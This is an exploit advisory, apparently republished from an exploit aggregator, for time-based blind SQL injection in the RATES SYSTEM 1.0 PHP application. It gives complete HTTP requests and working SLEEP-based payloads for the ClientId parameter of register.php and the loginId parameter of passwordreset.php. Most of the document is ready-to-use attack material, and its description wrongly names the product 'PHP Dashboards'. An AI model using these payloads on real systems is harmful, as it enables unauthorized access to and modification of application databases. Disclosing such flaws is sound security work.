Share
## https://sploitus.com/exploit?id=PACKETSTORM:163800
# Exploit Title: RATES SYSTEM 1.0 - 'Multiple' SQL Injections  
# Date: 11-08-2021  
# Exploit Author: Halit AKAYDIN (hLtAkydn)  
# Software Link: https://www.sourcecodester.com/php/14904/rates-system.html  
# Version: V1.0  
# Category: Webapps  
# Tested on: Linux/Windows  
  
# Description:  
# PHP Dashboards is prone to an SQL-injection vulnerability  
# because it fails to sufficiently sanitize user-supplied data before using  
# it in an SQL query.Exploiting this issue could allow an attacker to  
# compromise the application, access or modify data, or exploit latent  
# vulnerabilities in the underlying database.  
  
# Vulnerable Request:  
  
POST /register.php HTTP/1.1  
Host: localhost  
Content-Length: 70  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/register.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: PHPSESSID=rou48ptlhqkrlt68jpd9ugndgf  
Connection: close  
  
ClientId=0001&email=hltakydn%40pm.me&pwd1=123456&pwd2=123456&register=  
  
# Vulnerable Payload:  
# Parameter: ClientId (POST)  
# Type: time-based blind  
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
# Payload:  
  
ClientId=ojEY' AND (SELECT 4947 FROM (SELECT(SLEEP(10)))haeq) AND 'mdgj'='mdgj&email=&pwd1=iYkb&pwd2=&register=oQCR  
  
--------------------------------------------------------------------------------------------------------------------------  
  
# Vulnerable Request:  
  
POST /passwordreset.php HTTP/1.1  
Host: localhost  
Content-Length: 61  
Cache-Control: max-age=0  
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"  
sec-ch-ua-mobile: ?0  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/passwordreset.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: PHPSESSID=a8600labr48ehj6d8716ho0h61  
Connection: close  
  
loginId=1&clientId=1&email=hltakydn%40pm.me&pwd=123456&reset=  
  
# Vulnerable Payload:  
# Parameter: loginId (POST)  
# Type: time-based blind  
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
# Payload:  
  
loginId=FPDr' AND (SELECT 4535 FROM (SELECT(SLEEP(10)))SJvL) AND 'rtGr'='rtGr&clientId=&email=VXzw&pwd=&reset=xlcX